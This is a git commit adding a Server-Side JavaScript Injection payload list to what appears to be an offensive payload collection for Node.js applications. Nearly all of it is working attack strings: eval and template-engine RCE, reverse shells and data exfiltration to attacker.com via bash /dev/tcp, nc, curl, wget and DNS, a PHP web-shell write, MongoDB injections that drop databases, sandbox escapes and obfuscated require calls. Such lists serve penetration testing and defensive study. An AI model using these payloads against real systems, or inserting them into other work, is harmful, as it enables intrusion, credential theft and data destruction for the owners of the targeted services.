Add timing attacks, Tor-based attacks, SSJI, symbolic link attacks, and enhanced auth bypass payloads

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-05-26 19:36:33 +00:00 · 2026-01-05 15:54:35 +00:00
parent 5c4486169d
commit 1677a567e7
10 changed files with 4302 additions and 0 deletions
@@ -0,0 +1,411 @@
+# Server-Side JavaScript Injection (SSJI) Payloads
+
+# ============================================
+# 1. BASIC eval() INJECTION
+# ============================================
+
+# Simple expressions
+2+2
+Math.random()
+Date.now()
+JSON.stringify({})
+
+# Information disclosure
+process.version
+process.platform
+process.arch
+process.pid
+process.cwd()
+process.env
+global
+this
+
+# File system access
+require('fs').readFileSync('/etc/passwd', 'utf8')
+require('fs').readFileSync('/etc/shadow', 'utf8')
+require('fs').readFileSync('/proc/self/environ', 'utf8')
+require('fs').readdirSync('/').toString()
+require('fs').readdirSync('/home').toString()
+require('fs').readFileSync('package.json', 'utf8')
+require('fs').readFileSync('.env', 'utf8')
+
+# ============================================
+# 2. REMOTE CODE EXECUTION (RCE)
+# ============================================
+
+# Basic command execution
+require('child_process').execSync('whoami').toString()
+require('child_process').execSync('id').toString()
+require('child_process').execSync('pwd').toString()
+require('child_process').execSync('ls -la').toString()
+require('child_process').execSync('cat /etc/passwd').toString()
+require('child_process').execSync('uname -a').toString()
+
+# Reverse shell
+require('child_process').exec('bash -i >& /dev/tcp/attacker.com/4444 0>&1')
+require('child_process').exec('nc -e /bin/bash attacker.com 4444')
+require('child_process').spawn('nc', ['-e', '/bin/bash', 'attacker.com', '4444'])
+
+# Data exfiltration
+require('child_process').execSync('curl attacker.com/?data=$(cat /etc/passwd|base64)').toString()
+require('child_process').execSync('wget --post-file=/etc/passwd attacker.com').toString()
+
+# Write backdoor
+require('fs').writeFileSync('/tmp/backdoor.js', 'malicious code')
+require('fs').writeFileSync('shell.php', '<?php system($_GET["cmd"]); ?>')
+
+# ============================================
+# 3. FUNCTION CONSTRUCTOR INJECTION
+# ============================================
+
+# Basic Function constructor
+new Function('return 2+2')()
+new Function('return process.version')()
+new Function('return require("os").userInfo()')()
+
+# RCE via Function constructor
+new Function('return require("child_process").execSync("whoami").toString()')()
+new Function('return global.process.mainModule.require("child_process").execSync("id").toString()')()
+
+# ============================================
+# 4. MONGODB $where INJECTION
+# ============================================
+
+# Basic MongoDB injection
+admin' || '1'=='1
+' || true || '
+' || '1'=='1' || '
+'; return true; //
+admin'; return true; //
+
+# MongoDB data exfiltration
+'; return this.password.match(/^a/); //
+'; return this.email.includes("admin"); //
+'; return this.role == "admin"; //
+
+# MongoDB enumeration
+'; var users = db.users.find(); return true; //
+'; db.users.find().forEach(function(u){print(u)}); return true; //
+
+# MongoDB command execution (if possible)
+'; require('child_process').execSync('whoami'); return true; //
+'; var fs = require('fs'); fs.readFileSync('/etc/passwd'); return true; //
+
+# MongoDB DoS
+'; while(true){}; //
+'; db.users.drop(); return true; //
+'; db.dropDatabase(); return true; //
+
+# ============================================
+# 5. TEMPLATE INJECTION (HANDLEBARS)
+# ============================================
+
+# Handlebars RCE
+{{#with "s" as |string|}}
+  {{#with "e"}}
+    {{#with split as |conslist|}}
+      {{this.pop}}
+      {{this.push (lookup string.sub "constructor")}}
+      {{this.pop}}
+      {{#with string.split as |codelist|}}
+        {{this.pop}}
+        {{this.push "return require('child_process').execSync('whoami');"}}
+        {{this.pop}}
+        {{#each conslist}}
+          {{#with (string.sub.apply 0 codelist)}}
+            {{this}}
+          {{/with}}
+        {{/each}}
+      {{/with}}
+    {{/with}}
+  {{/with}}
+{{/with}}
+
+# Simplified Handlebars payload
+{{this}}
+{{this.constructor}}
+{{this.constructor.constructor}}
+
+# ============================================
+# 6. EJS TEMPLATE INJECTION
+# ============================================
+
+<%= global.process.mainModule.require('child_process').execSync('whoami') %>
+<%= require('child_process').execSync('cat /etc/passwd').toString() %>
+<%= global.process.mainModule.require('fs').readFileSync('/etc/passwd', 'utf8') %>
+<%= process.env %>
+<%= JSON.stringify(process.env) %>
+
+# ============================================
+# 7. PUG/JADE TEMPLATE INJECTION
+# ============================================
+
+#{global.process.mainModule.require('child_process').execSync('id')}
+#{function(){return require('child_process').execSync('whoami')}()}
+#{require('child_process').execSync('cat /etc/passwd').toString()}
+- var x = global.process.mainModule.require('child_process').execSync('ls').toString()
+= x
+
+# ============================================
+# 8. VM SANDBOX ESCAPE
+# ============================================
+
+# Constructor chain escape
+this.constructor.constructor('return process')()
+this.constructor.constructor('return global')()
+({}).constructor.constructor('return this')()
+
+# Process access
+this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString()
+(function(){return this.constructor.constructor('return process')()})()
+({}).constructor.constructor('return global.process.mainModule.require("child_process").execSync("id").toString()')()
+
+# Alternative escapes
+(function(){return this})().constructor.constructor('return process')()
+arguments.callee.caller.constructor('return process')()
+
+# ============================================
+# 9. PROTOTYPE POLLUTION TO RCE
+# ============================================
+
+# Prototype pollution
+{"__proto__": {"isAdmin": true}}
+{"__proto__": {"polluted": "yes"}}
+{"constructor": {"prototype": {"isAdmin": true}}}
+
+# Pollution leading to RCE
+{"__proto__": {"toString": "require('child_process').execSync('whoami').toString()"}}
+{"__proto__": {"valueOf": "require('child_process').execSync('id')"}}
+
+# ============================================
+# 10. SETTIMEOUT/SETINTERVAL INJECTION
+# ============================================
+
+require('child_process').exec('curl attacker.com/?data=$(whoami)')
+require('fs').writeFileSync('/tmp/pwned', 'hacked')
+require('child_process').execSync('nc attacker.com 4444 -e /bin/bash')
+global.process.exit(1)
+
+# ============================================
+# 11. REQUIRE VARIATIONS
+# ============================================
+
+# Direct require
+require('child_process')
+require('fs')
+require('net')
+require('http')
+
+# Global require
+global.require('child_process')
+global.process.mainModule.require('child_process')
+
+# Module constructor
+process.mainModule.constructor._load('child_process')
+global.process.mainModule.constructor._load('fs')
+
+# ============================================
+# 12. ENVIRONMENT VARIABLE EXFILTRATION
+# ============================================
+
+process.env
+JSON.stringify(process.env)
+process.env.PATH
+process.env.HOME
+process.env.USER
+process.env.SECRET_KEY
+process.env.DATABASE_URL
+process.env.API_KEY
+
+# ============================================
+# 13. FILE READ VARIATIONS
+# ============================================
+
+# Read sensitive files
+require('fs').readFileSync('/etc/passwd', 'utf8')
+require('fs').readFileSync('/etc/shadow', 'utf8')
+require('fs').readFileSync('/etc/hosts', 'utf8')
+require('fs').readFileSync('/proc/self/environ', 'utf8')
+require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf8')
+require('fs').readFileSync('config/database.yml', 'utf8')
+require('fs').readFileSync('.env', 'utf8')
+require('fs').readFileSync('package.json', 'utf8')
+
+# Directory listing
+require('fs').readdirSync('/').toString()
+require('fs').readdirSync('/etc').toString()
+require('fs').readdirSync('/home').toString()
+require('fs').readdirSync('.').toString()
+
+# ============================================
+# 14. COMMAND INJECTION VIA CHILD_PROCESS
+# ============================================
+
+# exec variations
+require('child_process').exec('cat /etc/passwd', (e,o)=>console.log(o))
+require('child_process').execSync('whoami').toString()
+require('child_process').execFileSync('ls', ['-la']).toString()
+
+# spawn variations
+require('child_process').spawn('cat', ['/etc/passwd'])
+require('child_process').spawnSync('id').stdout.toString()
+
+# ============================================
+# 15. NETWORK OPERATIONS
+# ============================================
+
+# HTTP request
+require('http').get('http://attacker.com/?data=exfiltrated')
+require('https').get('https://attacker.com/?data=' + process.env.SECRET)
+
+# DNS exfiltration
+require('dns').resolve4(process.env.SECRET + '.attacker.com')
+
+# Socket connection
+require('net').connect(4444, 'attacker.com')
+
+# ============================================
+# 16. PROCESS MANIPULATION
+# ============================================
+
+process.exit(1)
+process.kill(process.pid)
+process.chdir('/')
+process.binding('spawn_sync')
+
+# ============================================
+# 17. CRYPTO MODULE ACCESS
+# ============================================
+
+require('crypto').randomBytes(16).toString('hex')
+require('crypto').getHashes()
+require('crypto').getCiphers()
+
+# ============================================
+# 18. OS MODULE ACCESS
+# ============================================
+
+require('os').userInfo()
+require('os').hostname()
+require('os').platform()
+require('os').arch()
+require('os').cpus()
+require('os').networkInterfaces()
+require('os').tmpdir()
+require('os').homedir()
+
+# ============================================
+# 19. PATH MODULE FOR TRAVERSAL
+# ============================================
+
+require('path').resolve('/etc/passwd')
+require('path').join(__dirname, '../../../etc/passwd')
+
+# ============================================
+# 20. MONGODB SPECIFIC INJECTIONS
+# ============================================
+
+# $function aggregation (MongoDB 4.4+)
+{$function: {
+  body: function() { return require('child_process').execSync('whoami').toString(); },
+  args: [],
+  lang: "js"
+}}
+
+# mapReduce injection
+{
+  map: function() { require('child_process').exec('curl attacker.com/?data=pwned'); emit(this._id, 1); },
+  reduce: function(k, v) { return Array.sum(v); }
+}
+
+# ============================================
+# 21. EXPRESS SPECIFIC
+# ============================================
+
+# res.render with unsafe data
+<%= user.input %>
+#{user.input}
+{{user.input}}
+
+# ============================================
+# 22. WEBPACK/BUNDLER SPECIFIC
+# ============================================
+
+__webpack_require__
+__non_webpack_require__
+
+# ============================================
+# 23. ELECTRON SPECIFIC
+# ============================================
+
+require('electron').remote.require('child_process')
+require('electron').ipcRenderer.send('exploit')
+
+# ============================================
+# 24. OBFUSCATED PAYLOADS
+# ============================================
+
+# String concatenation
+req+'uire'('child_'+'process').exec('whoami')
+
+# Unicode escaping
+require('\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073')
+
+# Hex encoding
+require(Buffer.from('6368696c645f70726f63657373', 'hex').toString())
+
+# Base64
+require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString())
+
+# Computed property access
+global['pro'+'cess'].mainModule['req'+'uire']('child_process')
+
+# ============================================
+# 25. NESTING AND CHAINING
+# ============================================
+
+require('child_process').exec('wget http://attacker.com/shell.sh -O /tmp/s.sh && bash /tmp/s.sh')
+require('child_process').execSync('curl attacker.com/$(cat /etc/passwd | base64)').toString()
+
+# ============================================
+# 26. TIME-BASED BLIND SSJI
+# ============================================
+
+require('child_process').execSync('sleep 5')
+setTimeout(function(){}, 5000)
+require('child_process').execSync('ping -c 5 attacker.com')
+
+# ============================================
+# 27. OUT-OF-BAND DATA EXFILTRATION
+# ============================================
+
+require('child_process').execSync('curl attacker.com -d "$(cat /etc/passwd)"')
+require('child_process').execSync('wget --post-data="$(env)" attacker.com')
+require('child_process').execSync('nslookup $(whoami).attacker.com')
+
+# ============================================
+# 28. WRITESTREAM FOR PERSISTENCE
+# ============================================
+
+require('fs').createWriteStream('/tmp/backdoor.js').write('malicious code')
+
+# ============================================
+# 29. REGEX DOS (ReDoS) via SSJI
+# ============================================
+
+/(a+)+b/.test('aaaaaaaaaaaaaaaaaaaaaa!')
+/(a|a)*b/.test('aaaaaaaaaaaaaaaaaaaaaa!')
+
+# ============================================
+# 30. TESTING PAYLOADS
+# ============================================
+
+# Detection payloads
+throw new Error('SSJI Test')
+console.log('SSJI_TEST_' + Date.now())
+require('fs').writeFileSync('/tmp/ssji_test_' + Date.now(), 'test')
+
+# Simple arithmetic to confirm execution
+7*7
+Math.sqrt(16)
+[1,2,3].join(',')